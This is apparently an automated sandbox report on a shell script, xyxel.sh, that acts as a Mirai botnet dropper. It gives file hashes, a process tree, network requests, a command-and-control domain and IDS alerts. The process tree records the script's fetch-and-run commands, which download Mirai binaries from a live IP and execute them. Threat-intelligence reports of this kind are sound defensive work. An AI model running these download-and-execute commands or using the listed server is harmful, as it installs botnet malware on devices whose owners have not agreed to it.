| File name: | xyxel.sh |
| Full analysis: | https://app.any.run/tasks/ce13cf50-91aa-472b-81c9-cb12301401bf |
| Verdict: | Malicious activity |
| Threats: | A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. |
| Analysis date: | June 30, 2025, 14:40:18 |
| OS: | Ubuntu 22.04.2 |
| Tags: | |
| Indicators: | |
| MIME: | text/x-shellscript |
| File info: | Bourne-Again shell script, ASCII text executable |
| MD5: | 222DD4FD41F8AB671B60201143F17C7F |
| SHA1: | 403E8A5C9E8F3A68F03B91B8A3F951FF06961D2B |
| SHA256: | 7F783549F7A0E724B5F0D6042A5B24087E0B1DE03F575A4406CF30311964ACE3 |
| SSDEEP: | 24:vXsvmvsRnsrsja9aUis2NQfBsxNoxKeJqTU3NNIt3oeks5Kb86pJoiCekB:vcvmvisgja9aUis8bmqTUwJ5u86PeekB |
| .sh | | | Linux/UNIX shell script (100) |
|---|
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 41391 | /bin/sh -c "sudo chown user /tmp/xyxel\.sh && chmod +x /tmp/xyxel\.sh && DISPLAY=:0 sudo -iu user /tmp/xyxel\.sh " | /usr/bin/dash | — | UbvyYXL4x2mYa65Q |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41392 | sudo chown user /tmp/xyxel.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41393 | chown user /tmp/xyxel.sh | /usr/bin/chown | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41394 | chmod +x /tmp/xyxel.sh | /usr/bin/chmod | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41395 | sudo -iu user /tmp/xyxel.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41396 | /bin/bash /tmp/xyxel.sh | /usr/bin/bash | — | sudo |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41397 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41398 | wget http://207.167.64.24/mirai.i486 | /usr/bin/wget | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41399 | chmod 777 mirai.i486 | /usr/bin/chmod | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 41400 | ./mirai.i486 xyxel | /tmp/mirai.i486 | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 185.125.190.48:80 | http://connectivity-check.ubuntu.com/ | GB | — | — | whitelisted |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.mips | US | binary | 78.4 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.i486 | US | binary | 61.0 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.x86 | US | binary | 56.5 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.i686 | US | binary | 61.7 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.x64 | US | binary | 61.0 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.mpsl | US | binary | 81.9 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.arm | US | binary | 60.8 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.arm5n | US | binary | 53.8 Kb | malicious |
— | — | GET | 200 | 207.167.64.24:80 | http://207.167.64.24/mirai.arm6 | US | binary | 72.7 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 185.125.190.48:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
— | — | 169.150.255.180:443 | odrs.gnome.org | — | GB | whitelisted |
— | — | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
— | — | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
— | — | 185.125.188.57:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
— | — | 207.167.64.24:80 | c2.atomdata.xyz | DEDIOUTLET-NETWORKS | US | malicious |
— | — | 65.222.202.53:80 | — | UUNET | US | unknown |
— | — | 207.167.64.24:23 | c2.atomdata.xyz | DEDIOUTLET-NETWORKS | US | malicious |
Domain | IP | Reputation |
|---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
api.snapcraft.io |
| whitelisted |
c2.atomdata.xyz |
| unknown |
13.100.168.192.in-addr.arpa |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
— | — | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x86 |
— | — | Potentially Bad Traffic | ET INFO x86 File Download Request from IP Address |
— | — | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
— | — | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
— | — | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .i686 File |
— | — | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x64 |
— | — | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
— | — | A Network Trojan was detected | AV INFO Possible Mirai .mips Executable Download |
— | — | Potentially Bad Traffic | ET INFO MIPS File Download Request from IP Address |